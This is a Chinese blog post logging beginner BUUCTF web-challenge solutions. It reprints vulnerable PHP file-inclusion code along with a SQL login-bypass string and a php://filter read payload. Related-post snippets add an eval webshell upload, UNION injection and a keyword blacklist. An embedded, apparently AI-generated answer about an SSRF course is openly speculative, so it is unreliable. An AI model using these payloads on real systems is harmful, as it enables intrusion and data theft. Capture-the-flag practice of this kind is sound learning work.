BUU刷题日志

最新推荐文章于 2023-07-13 11:41:11 发布
原创 最新推荐文章于 2023-07-13 11:41:11 发布 · 338 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

为什么BUU的题这么难啊 对我一个萌新来说 太痛苦了
这个博客应该不会太详细 因为是给自己回头看看用的
虽然每天都会刷 但是特别懒 不一定会写博客hhhh

BUUCTF

(2021.2.3)

[HCTF 2018]WarmUp(代码审计)

这居然是web部分解出来最多的题 我完全不能理解 tcl

根据提示来到源码界面

<?php

    class emmm

    {

        public static function checkFile(&$page)

        {

            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

            if (! isset($page) || !is_string($page)) {

                echo "you can't see it";

                return false;

            }

            if (in_array($page, $whitelist)) {

                return true;

            }

            $_page = mb_substr(

                $page,

                0,

                mb_strpos($page . '?', '?')

            );

            if (in_array($_page, $whitelist)) {

                return true;

            }

            $_page = urldecode($page);

            $_page = mb_substr(

                $_page,

                0,

                mb_strpos($_page . '?', '?')

            );

            if (in_array($_page, $whitelist)) {

                return true;

            }

            echo "you can't see it";

            return false;

        }

    }

    if (! empty($_REQUEST['file'])

        && is_string($_REQUEST['file'])

        && emmm::checkFile($_REQUEST['file'])

    ) {

        include $_REQUEST['file'];

        exit;

    } else {

        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";

    } 

?>

看了眼hint.php 说在flag在ffffllllaaaagggg里 看源码知道是文件包含漏洞
感觉这题好难解释啊 我还是一层一层加…/试出来的hhh (这题先晾着吧 之后在补wp)

[极客大挑战 2019]EasySQL

admin/admin试了一下 然后密码处万能密码1'or'1'='1直接秒了

[极客大挑战 2019]Havefun

没啥意思 f12传参?cat=dog
为什么 这两题写出来的人比第一题的代码审计少???

极客大挑战 2019 Secret File

f12看到个连接 点进去在这里插入图片描述
点进去直接查阅结束 翻了翻源码 没东西 尝试burp抓包
找到里面有个secr3t.php 访问 代码审计

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

直接访问flag.php没东西
不给用input 就用filter呗 然后用base64让他显示出来
?file=php://filter/convert.base64-encode/resource=flag.php
拿到的base64解码

还写了两题 但是太懒了 等哪天不懒在补

[BUUCTF] 第二天训练日志
Y1seco的博客
07-31 469
[CISCN2019 华东南赛区]Double Secret 知识点 RC4 模板注入 WP dirsearch扫出来secret目录 发现: 尝试传参secret发现超过4位会报错,查看报错中的信息发现 解密算法是RC4,密钥是HereIsTreasure,并且调用render_template_string渲染执行。 因此将命令进行RC4加密,并且url编码 import base64 from urllib import parse def rc4_main(key = "init_key"
buuctf-Secret File(涉及文件包含)
m0_62094846的博客
10-27 275
打开网页后出现这样的页面,没有可以点击的地方,也没出现什么有用的信息,查看源代码 也没看到什么有用的信息,但出现了一个可以点击的代码,点击一下,进入这样的界面 又出现一个按钮,点击后却说查阅结束,要我们回去看看 查看后有个有意思的发现 源页面中的代码是action.php 但是点开后的页面却是end.php 所以可以判断两个页面之间还有一个页面,但是无论怎么输入action.php,页面都会跳转到end.php,可能是页面转的太快,试试抓包让它停下来 抓包...
BUUDay6
姜小孩的博客
03-24 1761
目录 [BJDCTF2020]ZJCTF,不过如此 总结: [网鼎杯 2020 朱雀组]phpweb 总结: [强网杯 2019]高明的黑客 总结: [BJDCTF2020]ZJCTF,不过如此 上来看到源码 <?php ​ error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
BUU-web
qq_46540840的博客
09-05 435
[NCTF2019]SQLi 访问robots.txt 发现hint $black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i"; If $_POST['pas
buu WEEK1
carol2358的博客
12-06 598
文章目录WEB [ZJCTF 2019]NiZhuanSiWeiREAL [ThinkPHP]5-Rce WEB [ZJCTF 2019]NiZhuanSiWei 三个参数 text,file,password,先看逻辑,要text和welcome to the zjctf相等,才能进入if,否则只是高亮本文件。 涉及到data伪协议 ?text=data:text/plain,welcome to the zjctf php://input ?file=php://filter/convert.bas
BUU记录——4
weixin_43610673的博客
08-31 2734
[HarekazeCTF2019]Avatar Uploader 1 finfo_file用来判断上传图片类型,getimagesize可以判断文件像素大小,并且再进行一次类型判断。 finfo_file函数应该是直接打开文件,来获取文件类型。而getimagesize函数是通过图片尺寸数组中第三个元素是否为int型的3来判断的。 finfo_file 可以识别 png 图片( 十六进制下 )的第一行,而 getimagesize 不可以。 所以我们只要保持png头就可以,将他的相符判断
BUU记录——2
weixin_43610673的博客
06-17 2276
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
寒假buu记录 序列化与反序列化、XSS注入、UPLOAD-LABS文件上传
qq_62984336的博客
03-02 2748
总结 这个假期看了很多师傅的wp,有一些贴在总结里了,希望对大家也有帮助。(如有冒犯请联系我删除) 序列化与反序列化总结 pop链构造POP链的构造_一个打渔的的博客K6uQ5H7^ff(R-优快云博客_pop链 序列化与反序列化序列化和反序列化的详解_tree_ifconfig的博客-优快云博客_序列化和反序列化 简述序列化与反序列化 - 寒江独钓人 - 博客园 unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 inte
buu(4)
qq_62046696的博客
03-22 666
目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
BUU-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
buu复现一
m0_73393932的博客
11-30 428
逆向
BUU-Pwn-ciscn_2019_en_2(和BUUciscn_2019_c_1为同一
一个啥也不会的小菜鸡!
06-21 276
是一个菜单,有一个栈溢出漏洞,但里面有字符串加密逻辑,绕过后才可以使用栈溢出。而且本中没有后门函数等,所以需要自己去寻找,首先泄露除一个函数地址,进而计算出system和“/bin/sh”的位置。通过ROPgadget --binary ciscn_2019_c_1 >gadgets。-》puts_got_addr的地址。-》puts_plt_addr的地址。通过IDA测算栈溢出距离:0x50。[[ROPgadget的使用]]获取pop_rdi_ret片段。[[Stack上函数传参]]
buu [2019红帽杯]childRE wp
苗_的博客
08-18 993
可以分为三大块来解 考点:二叉树(动态调试)、C++函数名修饰 1. 首先f5反编译,首先我们要求出outputString(长度为62),逆分析可以知道取outputString字符串的字符,然后对23取余和除数分别在a1234567890Qwer中找到对应位置,其值必须与str1和str2对应位置的值相等 上这一段脚本: str1 = "(_@4620!08!6_0*0442!@186%%0@3=66!!974*3234=&0^3&1@=&0908!6_0*&a
BUU-Pwn-rip
一个啥也不会的小菜鸡!
07-13 420
因为此出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问,但是远程的环境有问)里面有详细解释,涉及到[[堆栈平衡]]
CTFSHOW WEB入门反序列化篇
Npceer-一位网安初学者的博客
03-01 1282
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
CTFSHOW-WEB入门命令执行部分(持续更新)
Npceer-一位网安初学者的博客
02-01 783
命令执行0x01 web29 0x01 web29 笔记记在了另一个博客里面 第一次学命令执行 看了各路大佬的wp以及讲解视频 才能勉强拿到flag 视频 我这里就不细写了 自己也是一知半解 就不丢人了 大概学了手反引号和通配符的知识 ...
记一次在kali上给py2.7安装pip的事
Npceer-一位网安初学者的博客
01-25 698
1413412412
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 685
SQL注入0x01 web 171 不一定会所有都放上来(懒) 但是我尽量 0x01 web 171 总算是开始sql注入了 之前学了 但是没写几 也算个纯萌新了 所以基础会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
[CTFshow web入门]代码审计篇
Npceer-一位网安初学者的博客
08-09 630
前言 最近状态不太对 挺迷茫的 就先回来写点练习练习 暑假也进入后半段了 摸鱼摸不动了 最近就学一下代码审计吧 找几个小CMS复现一下漏洞 然后在跟这Y4和feng师傅的博客复现一些框架好了 也稍微学一下工具的使用 sqlmap啊seay啊啥的 文章目录前言web301web302web302 web301 基础 随便看一下 sql语句没有任何过滤 直接联合注入就行 $sql="select sds_password from sds_user where sds_username='".$usern
buu ssrf course 1
最新发布
10-10
<think>首先,用户查询是关于“buu平台ssrf课程1”的相关内容。用户提到了引用[1]到[4],但这些引用似乎是从之前的对话或上下文中提取的具体内容,并非直接相关的课程材料。用户说:“上述引用仅供参考,并不是用户真正的需求”,所以我需要专注于用户的核心问:查找BUU平台上的SSRF课程1相关内容。 BUU平台可能指的是一个网络安全学习平台,比如“Bugku University”或类似的东西,但我不确定具体的上下文。在引用中,提到了“buu记录”,这暗示BUU可能是一个CTF平台或在线学习平台,涉及SSRF(Server-Side Request Forgery)漏洞。 用户明确说:“我想查找buu平台上ssrf课程1的相关内容”,并且之前的引用涉及SSRF漏洞的实例和工具。 回顾系统级指令: - 所有行内数学表达式必须使用 $...$。 - 独立公式使用 $$...$$。 - 使用中文回答。 - 生成相关问。 - 回答中引用的段落末尾自然地添加引用标识。 - 回答结构清晰,帮助用户逐步解决问。 用户的上一次问是关于SSRF在BUU平台上的内容,所以我需要基于提供的引用和知识来回答。 分析引用: - [^1]:讨论SOAP的SSRF方法,提到CRLF注入和payload修改。 - [^2]:提到SoapClient类用于SSRF攻击。 - [^3]:涉及SSRFMe目,DNS重绑定漏洞,打Redis。 - [^4]:提到0day和Leaking目。 用户的问是关于“SSRF课程1”,所以我应该假设这是一个具体的课程或学习资源。 作为AI,我没有实时访问BUU平台的知识库,但我可以基于常见网络安全资源和这些引用推测内容。 可能的回答结构: 1. **理解问**:确认用户的需求是关于BUU平台的SSRF课程。 2. **提供相关信息**:基于引用和常识,描述SSRF漏洞的基础知识、常见攻击方法(如SOAP、DNS重绑定)、工具(如redis-ssrf)、以及BUU平台上的相关目。 3. **生成相关问**:在末尾添加相关问。 4. **引用标识**:如果引用内容,末尾添加[^number]。 由于用户说引用仅供参考,我应该优先基于推理提供内容。 推测SSRF相关内容: - SSRF基础:服务器伪造请求,访问内部资源。 - 在BUU平台:常见目如“SSRFMe”或类似。 - 从引用[3]:提到“[网鼎杯 2020 玄武组]SSRFMe”,这可能是BUU上的一道目。 - 课程1可能涵盖基础概念、工具和实践。 回答步骤: 1. **介绍SSRF**:简要解释SSRF是什么。 2. **BUU平台课程内容**:基于引用,推测课程可能包括: - SSRF via SOAPClient (from [^1] and [^2]) - DNS rebinding attacks (from [^3]) - Redis exploitation (from [^3] with tools like redis-rogue-server) - Practical challenges like "SSRFMe" on BUU. 3. **提供资源**:建议用户查看具体目或外部资源。 4. **生成相关问**:如关于具体工具、防御方法等。 5. **确保中文**:整个回答用中文撰写。 6. **格式**:如果有数学表达式,用$...$,但SSRF话可能不涉及数学,所以可能不需要。如果有变量或代码,用行内格式。 最终回答框架: - 开头:确认用户兴趣。 - 主体:描述推测的SSRF课程内容。 - 结尾:生成相关问。 </think>### BUU平台SSRF课程1相关内容分析 基于您提供的引用和常见网络安全资源,我将帮助您梳理BUU平台上SSRF(Server-Side Request Forgery)课程1的可能内容。SSRF是一种服务器端请求伪造漏洞,允许攻击者利用服务器发起任意请求,常用于访问内部资源或绕过防火墙。BUU平台(如Bugku CTF平台)常以实践目形式教授此类漏洞。以下是基于引用[1]、[2]、[3]、[4]的综合推测(引用仅供参考,我会结合普遍知识构建回答): 1. **SSRF基础概念与实践** SSRF课程1可能从基础入手,涵盖漏洞原理、攻击向量和简单利用方法: - 原理:SSRF允许恶意用户强制服务器向内部或外部系统发送请求(例如,访问localhost或内网服务)。 - 常见攻击向量:如SOAPClient类的利用(引用[2]),它可用于伪造HTTP请求[^2]。课程可能引用类似“[网鼎杯 2020 玄武组]SSRFMe”目(引用[3]),演示如何处理不支持自定义Headers的场景(如使用CRLF注入和payload修改,如 `\0` 和 `\0\0` 技巧)[^1]。 - 实践工具:课程可能推荐工具如 `redis-ssrf.py` 或 `redis-rogue-server`(引用[3]),用于自动化SSRF攻击Redis等数据库[^3]。 2. **DNS重绑定与内部资源访问** 课程1通常会深入DNS重绑定漏洞,这是SSRF的进阶技术: - 漏洞机制:通过操纵DNS响应,使服务器重复请求恶意域名,从而绕过IP限制(例如,访问 `http://0.0.0.0/hint.php` 以获取敏感信息,如Redis密码)[^3]。 - 实操案例:BUU目如“SSRFMe”可能被纳入课程,要求学习者利用SSRF打Redis服务(如设置键值或执行命令),引用工具如GitHub上的开源脚本进行复现[^3]。 3. **Payload构建与防御** 课程可能覆盖攻击payload的自定义技巧和防御策略: - Payload修改:教学中会教导如何利用特殊字符(如前缀 `s` 或 `S`)和编码绕过限制(引用[1]),例如在SOAP请求中注入CRLF攻击[^1]。 - 防御方法:课程可能总结常见防护措施,如输入验证、URL白名单和使用安全库(参考引用[4]的0day概念)[^4]。 为了深入学习,我建议您直接在BUU平台搜索“SSRF课程1”或相关目(如“SSRFMe”)。此外,可参考外部资源: - [SSRF漏洞详解与实战](https://zhuanlan.zhihu.com/p/103506795)(通用教程)。 - GitHub工具库如[xmsec/redis-ssrf](https://github.com/xmsec/redis-ssrf)(用于Redis攻击实践)[^3]。 如果您有具体目名称或代码片段,我可以帮助分析细节。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值